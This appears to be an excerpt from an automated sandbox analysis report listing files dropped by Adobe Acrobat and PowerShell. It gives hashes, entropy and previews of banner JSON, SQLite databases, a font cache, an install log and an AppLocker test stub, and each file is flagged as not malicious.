                  Preview:{"analyticsData":{"responseGUID":"e16dbf9f-b7b0-40bd-9633-ad33718ba3a1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736177319995,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):285
                  Entropy (8bit):5.36643772096193
                  Encrypted:false
                  SSDEEP:6:YEQXJ2HXNH8iyaVoZcg1vRcR0YChqoAvJfPmwrPeUkwRe9:YvXKXNciSZc0vthZGH56Ukee9
                  MD5:04507B0041279F3E10AD1381AB8242C0
                  SHA1:F1582366FBA0CB4456965BEDD83C1F0151D064E0
                  SHA-256:0A2CF9C54BD2D053BF88C31973A9C7CD52568C5AE9640FF2751A69DA605B9545
                  SHA-512:05F81DA76AB2DF34E4612DE9D6F80704ECAFB19A5224A1DAAEA1CAF4D7838B1037224CA1F780F9E03729B9EF4907582EAFD58CF38DF1CFE9E83235F42099208F
                  Malicious:false
                  Preview:{"analyticsData":{"responseGUID":"e16dbf9f-b7b0-40bd-9633-ad33718ba3a1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736177319995,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):1123
                  Entropy (8bit):5.6853255226915325
                  Encrypted:false
                  SSDEEP:24:Yv6XNciSzvth+pLgE9cQx8LennAvzBvkn0RCmK8czOCCSf:YvdiKL+hgy6SAFv5Ah8cv/f
                  MD5:BEF6DE09D4549C64123BB72744323E96
                  SHA1:082190BD517C92CC16A5AA39DB4493FBFDB22C46
                  SHA-256:BB443D22E4A2466D951B1304B9E0809834FC6D1105612FF60E186FA32145979E
                  SHA-512:DD6F6E2656256364E8B28CD7EBC1EA15E5C4EB04688E62104ED30B52B24959060CD553B064E6D195F72CAC3C5D8CE58B31A1D57CF65EB0B66886FCCAEE6F9794
                  Malicious:false
                  Preview:{"analyticsData":{"responseGUID":"e16dbf9f-b7b0-40bd-9633-ad33718ba3a1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736177319995,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):289
                  Entropy (8bit):5.3124095500424025
                  Encrypted:false
                  SSDEEP:6:YEQXJ2HXNH8iyaVoZcg1vRcR0YChqoAvJf8dPeUkwRe9:YvXKXNciSZc0vthZGU8Ukee9
                  MD5:4E4CF51C9CB8841B1445951A98B09C2E
                  SHA1:221E3D3A8DFE45276AE4385CD41C9D1F2F9F3030
                  SHA-256:AD44D517CDF65BE18573AE93409A7D8B4AC14614208CBB91AF8193D1F6C3CE2F
                  SHA-512:887A39C8BF9C94C87372E97A248B1BEA3CF021F9591C8AE91A2C4025898C75BDB68A508B969AD3D9D8C694F99AC8CCFACCC8094F1031DB64240F0625F46DAD15
                  Malicious:false
                  Preview:{"analyticsData":{"responseGUID":"e16dbf9f-b7b0-40bd-9633-ad33718ba3a1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736177319995,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):292
                  Entropy (8bit):5.316764289080343
                  Encrypted:false
                  SSDEEP:6:YEQXJ2HXNH8iyaVoZcg1vRcR0YChqoAvJfQ1rPeUkwRe9:YvXKXNciSZc0vthZGY16Ukee9
                  MD5:9ED106E1A21F2C4396BBE76815AA2171
                  SHA1:041C22EA6154108CC0AAD4FA46B0A2B8D05E3A04
                  SHA-256:FBE5142069C8EAB9C13A33951A1E781342C997C5E1E4597508E1D6057A132CFB
                  SHA-512:D24FDF3A98262BEFB3355A46DA5E5F780685585E31550662FED550B2805EF3ABAA4C53651F6ABDA773934008849CE3AE8F1316B55662177D99AA4D449A769C97
                  Malicious:false
                  Preview:{"analyticsData":{"responseGUID":"e16dbf9f-b7b0-40bd-9633-ad33718ba3a1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736177319995,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):289
                  Entropy (8bit):5.319820880593439
                  Encrypted:false
                  SSDEEP:6:YEQXJ2HXNH8iyaVoZcg1vRcR0YChqoAvJfFldPeUkwRe9:YvXKXNciSZc0vthZGz8Ukee9
                  MD5:244BB7217863F99C62DB02483B36F785
                  SHA1:858B8756D2A3D879E1EF7B458290909A29E0CF71
                  SHA-256:C98F592475B9DB4FE5ED0445CEEE425E4C07C9B01ADCE42A3D36E5ECBBBC78FB
                  SHA-512:85A213A026618C34B208A9E40EE9A50DF9C841342086ED69B7F6685C0B32EC5B827626F93CC30BD26C7633F40334D83652FC7E1F3AA05BF67A35FE382643F116
                  Malicious:false
                  Preview:{"analyticsData":{"responseGUID":"e16dbf9f-b7b0-40bd-9633-ad33718ba3a1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736177319995,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):295
                  Entropy (8bit):5.336657923302548
                  Encrypted:false
                  SSDEEP:6:YEQXJ2HXNH8iyaVoZcg1vRcR0YChqoAvJfzdPeUkwRe9:YvXKXNciSZc0vthZGb8Ukee9
                  MD5:2DF524A8B0D5CE567F1989A48FD2897D
                  SHA1:DA0B7A6C4DAB00C3FD6975026B595654AC841106
                  SHA-256:8D938E040241AFD304830DB63D4D0C337EDBA766B4EC6752D9A30E91E776C9A3
                  SHA-512:3A64ABC825B401E73AE803954FF895E186368A6F575D1E7B1311E57507845EDECE8CA99AAE9A91E89FE76B890E3E95C7733DB2568D49459FC12B36FD706CB28F
                  Malicious:false
                  Preview:{"analyticsData":{"responseGUID":"e16dbf9f-b7b0-40bd-9633-ad33718ba3a1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736177319995,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):289
                  Entropy (8bit):5.317938194861926
                  Encrypted:false
                  SSDEEP:6:YEQXJ2HXNH8iyaVoZcg1vRcR0YChqoAvJfYdPeUkwRe9:YvXKXNciSZc0vthZGg8Ukee9
                  MD5:D5AA55F7C659FB24A65C0E4DA06E81FE
                  SHA1:F4F56D96B7047FFD5AF5D4A5DAB8BCF46D522EFD
                  SHA-256:F4FAC8ED5ECF4DE0F324043B1A45F9C04BBB3992F1248451800E6F264CF7D662
                  SHA-512:7B3C960B66C4EBD595BBE4E6A020C0FBEE61F2FCB55837B03D8268D75CC24433AD7850FF0945A86B5BAFB81E02EF231BBF770435A394E34D81CD4557671F72FD
                  Malicious:false
                  Preview:{"analyticsData":{"responseGUID":"e16dbf9f-b7b0-40bd-9633-ad33718ba3a1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736177319995,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):284
                  Entropy (8bit):5.304304380974622
                  Encrypted:false
                  SSDEEP:6:YEQXJ2HXNH8iyaVoZcg1vRcR0YChqoAvJf+dPeUkwRe9:YvXKXNciSZc0vthZG28Ukee9
                  MD5:ADF59F87A3304744FAA10D23761C3F2F
                  SHA1:8616138654A7107479F24D9BBE4D7E8DE7E20328
                  SHA-256:55438EBC1A3650BFC240DDD1124FF82A6C7D14E3755D3DF64A46232B541ED7D1
                  SHA-512:833013735DE8FC9447E062992E86FB6430C00042A9BB878B93CCBF2B1917C132388DE22D786EA5FF7F0C2D06C250691B3756CBE7F773B78CE6EFC803CDC6BD03
                  Malicious:false
                  Preview:{"analyticsData":{"responseGUID":"e16dbf9f-b7b0-40bd-9633-ad33718ba3a1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736177319995,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):291
                  Entropy (8bit):5.301362005973164
                  Encrypted:false
                  SSDEEP:6:YEQXJ2HXNH8iyaVoZcg1vRcR0YChqoAvJfbPtdPeUkwRe9:YvXKXNciSZc0vthZGDV8Ukee9
                  MD5:595854D0DF7587A47991838FE2B2B35B
                  SHA1:11AD9AE40E3794DAF2AD392CBCFFFA78881D7266
                  SHA-256:07418D8B660BE3B1E727220A56458A1AC6B8458D40B50DE978A151C7CA05AFAA
                  SHA-512:FBFBBE8069F695F12E77FB8EEE07E30C354D1BB32FF9A78567E017D224F85656D6226C6AFF40B3426A692566B8BA60222771A392F8CF9FA67F922DBC399475AA
                  Malicious:false
                  Preview:{"analyticsData":{"responseGUID":"e16dbf9f-b7b0-40bd-9633-ad33718ba3a1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736177319995,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):287
                  Entropy (8bit):5.306557615601192
                  Encrypted:false
                  SSDEEP:6:YEQXJ2HXNH8iyaVoZcg1vRcR0YChqoAvJf21rPeUkwRe9:YvXKXNciSZc0vthZG+16Ukee9
                  MD5:8600F1A85036D4B5028A96461C41BED6
                  SHA1:FEB92C86D55C36DE930E217A32105C145DB1475D
                  SHA-256:101705653CA1B5F78DF60C0A09843899A7F991A6685674C837498228B279DD4A
                  SHA-512:C87F4250CA49ECDF8FCC58E7E50DB56D3BC3803A851140B99FC483594F705A3737B0AB434612B7AE59CF8CDD66574C0F0F7BD88AD66B66401593A43C91772270
                  Malicious:false
                  Preview:{"analyticsData":{"responseGUID":"e16dbf9f-b7b0-40bd-9633-ad33718ba3a1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736177319995,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):1090
                  Entropy (8bit):5.660648597987533
                  Encrypted:false
                  SSDEEP:24:Yv6XNciSzvthiamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSf:YvdiKL8BgkDMUJUAh8cvMf
                  MD5:100A9EF5B4C1731DCCE8C2FCA2216D50
                  SHA1:A26CFA76772FFCDE141C1A8341374BBED5CC3E53
                  SHA-256:C79DA64B1336687343094A5EA580A689150BDFD21515E784890FD3D2470A2BD9
                  SHA-512:45250CAB27B983FEE0D9488D9699562FE8D3BE48FDA11B3CC7D0DBDF70475361A1AB885A277EB64F77D275581DF7D97022E87C6583C6FF35FF5142C79207261E
                  Malicious:false
                  Preview:{"analyticsData":{"responseGUID":"e16dbf9f-b7b0-40bd-9633-ad33718ba3a1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736177319995,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):286
                  Entropy (8bit):5.280824686400616
                  Encrypted:false
                  SSDEEP:6:YEQXJ2HXNH8iyaVoZcg1vRcR0YChqoAvJfshHHrPeUkwRe9:YvXKXNciSZc0vthZGUUUkee9
                  MD5:10A924E7AD6E8EB51ACD9C029E4B8EF1
                  SHA1:BD113BBEF3A9E15C3FEA71C22733C023319017F9
                  SHA-256:CD7ADD605260B255AF1E203403ECDA0C00CFCD6119C9AF70D073D3D7641BF2C0
                  SHA-512:71ED2FEC77B54A461B7670C3517E6AF9E6E82AB1780BDA8976F2B38532B11DD3812789CD29BB0CC2F2BCB9AFEA0321621C4AE218D9A696B9EFA4F3183DA722CD
                  Malicious:false
                  Preview:{"analyticsData":{"responseGUID":"e16dbf9f-b7b0-40bd-9633-ad33718ba3a1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736177319995,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):282
                  Entropy (8bit):5.2990619741063805
                  Encrypted:false
                  SSDEEP:6:YEQXJ2HXNH8iyaVoZcg1vRcR0YChqoAvJTqgFCrPeUkwRe9:YvXKXNciSZc0vthZGTq16Ukee9
                  MD5:988C9D5EF2FB3191EBDA5F3C00BFCA01
                  SHA1:3260A74E721134BB161D68CAAC36B2EE63B91AF8
                  SHA-256:EF83E19BD638B6E8A9F77A828614E776AAF0CC9D0537783C29098EB0B1DC270B
                  SHA-512:60F65021C67FA9CF0B3BE2F2221A57532A277F17769EB9C48EA78A34C21A48E624849AF62599D94E5AC6C2C69B8227BCE8957A5CADA65FE355CEFB5536363E91
                  Malicious:false
                  Preview:{"analyticsData":{"responseGUID":"e16dbf9f-b7b0-40bd-9633-ad33718ba3a1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736177319995,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4
                  Entropy (8bit):0.8112781244591328
                  Encrypted:false
                  SSDEEP:3:e:e
                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                  Malicious:false
                  Preview:....
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):2814
                  Entropy (8bit):5.128696188138115
                  Encrypted:false
                  SSDEEP:24:Yex111vGa8zayUvrJvRvwiHaMvJrYvY41vW1v0a34wvPj3ej0Syvf/5vC2SCB2Lc:Yex1aSMiHNrvtx3ArKUtKMnwVz0h9C1
                  MD5:BA911B8D17EEE549F8FF7280EC327947
                  SHA1:2911DA626EBC5743A859DCAC4AD93A2CA2A9C976
                  SHA-256:D7A8C5B82885461AB9EA9F0FAA500419E3AEFF97E646D43929106E5918C8B8FE
                  SHA-512:702A1455AEB3A2A545BAA9A070FBDBF1EB9D86E1BE499F87A0A66F413637354723EC03711BB189F5A0DF431CED07341276C87C58CA0D0A22E28A6D90FD87AF43
                  Malicious:false
                  Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"4015dbdf1f4f2054bcbd28975439087e","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736001489000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"58ae2587e25b2b64176d42773e1a0990","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736001489000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"ff8e985e107caf2e86409de6311b8d91","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736001489000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"4b54406d684489c253b3d276294b53e2","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736001489000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"bab794d53f0c4a0f07e4f0884626e357","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736001489000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"249a69a6f4d7ea488e157e126abd7b76","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                  Category:dropped
                  Size (bytes):12288
                  Entropy (8bit):1.1884852508370944
                  Encrypted:false
                  SSDEEP:48:TGufl2GL7msEHUUUUUUUUzCSvR9H9vxFGiDIAEkGVvpnk:lNVmswUUUUUUUUzC+FGSItzk
                  MD5:6A4F931CEFEB5A8F1EF606305DB50B49
                  SHA1:11CB026B75BA97348DAA79D835A4E29EB4448B44
                  SHA-256:7544CFED24145EB73BE20C12DB031E04E83F195BBE0D1A367A0FFE7C4F484255
                  SHA-512:2E1ECE92C097A2690F5619CB0096B7C17698AD48B2C55B6DA533D3FEAFBEAA1F4300FD732BE11C9FEE060CC3E3338C916A7D1C9CFE48936DE3135145CE283A0C
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:SQLite Rollback Journal
                  Category:dropped
                  Size (bytes):8720
                  Entropy (8bit):1.6076095488301008
                  Encrypted:false
                  SSDEEP:48:7MAbKUUUUUUUUUUzQvR9H9vxFGiDIAEkGVvXqFl2GL7msy:7huUUUUUUUUUUzoFGSItVKVmsy
                  MD5:B536483C797A982D793A04045BA7B06B
                  SHA1:9078101F8ED74836F320B018D039C632C359950F
                  SHA-256:5FF454634183BF3753F32DF42ABF4A578A3B9E67273AAB162A34FF1E036F6A63
                  SHA-512:3D3BB1A877C08E1B1DC3322B0DF5F9F9D7C50DDF935CA88CB9EADB21DC6634616B63712784A3ECE571876BCDF658F9820D2F5754B1F8CA2650ADF784794EA0CB
                  Malicious:false
                  Preview:.... .c...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):66726
                  Entropy (8bit):5.392739213842091
                  Encrypted:false
                  SSDEEP:768:RNOpblrU6TBH44ADKZEg/IriYZnW5VkXChWh1r05iHAASvYyu:6a6TZ44ADE/Ir/ZnW5V+HVMK
                  MD5:701ED1DCB77AE88E70C1F8BBD02F5F08
                  SHA1:C44F877010DC0A269FAEE187B0076557CAA3D6CC
                  SHA-256:DDB38AE05E72B2E45DE5A968757F7CAB1DEA8F65321F46A050F411E097149054
                  SHA-512:BACD1B328A4B6793D3D72F5956CF410240D730F5D8D95C4574650D681DBDFC14DE9E23B0A9A2A4FA730DF8FC8D6AA1D553865193A7D7A83350E76D51DCCF01D8
                  Malicious:false
                  Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):1.1940658735648508
                  Encrypted:false
                  SSDEEP:3:Nlllulbnolz:NllUc
                  MD5:F23953D4A58E404FCB67ADD0C45EB27A
                  SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                  SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                  SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                  Malicious:false
                  Preview:@...e................................................@..........
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):246
                  Entropy (8bit):3.5325285763919316
                  Encrypted:false
                  SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K82pCl0iNUlHYlYH:Qw946cPbiOxDlbYnuRK/pQUFYlYH
                  MD5:B7869957CA9D705815F2798573046EC2
                  SHA1:BFA27DE1CAA76C84E3317699239B5F4257610044
                  SHA-256:1C896DA921E5A12253937179467AD64E1810B000025117B7512581DDE66BEA8B
                  SHA-512:D7C8F19C304C8503CC847B46E9028B39FD2F0CA57CDCB04FC6CCDEBC8A00B12A0FE3D62CBBFDF2531DBAA41223B6C666314EB7DCE244770CD3B3931F85CA38C0
                  Malicious:false
                  Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.4./.0.1./.2.0.2.5. . .0.9.:.3.8.:.1.0. .=.=.=.....
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                  Category:dropped
                  Size (bytes):144514
                  Entropy (8bit):7.992637131260696
                  Encrypted:true
                  SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                  MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                  SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                  SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                  SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                  Malicious:false
                  Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..
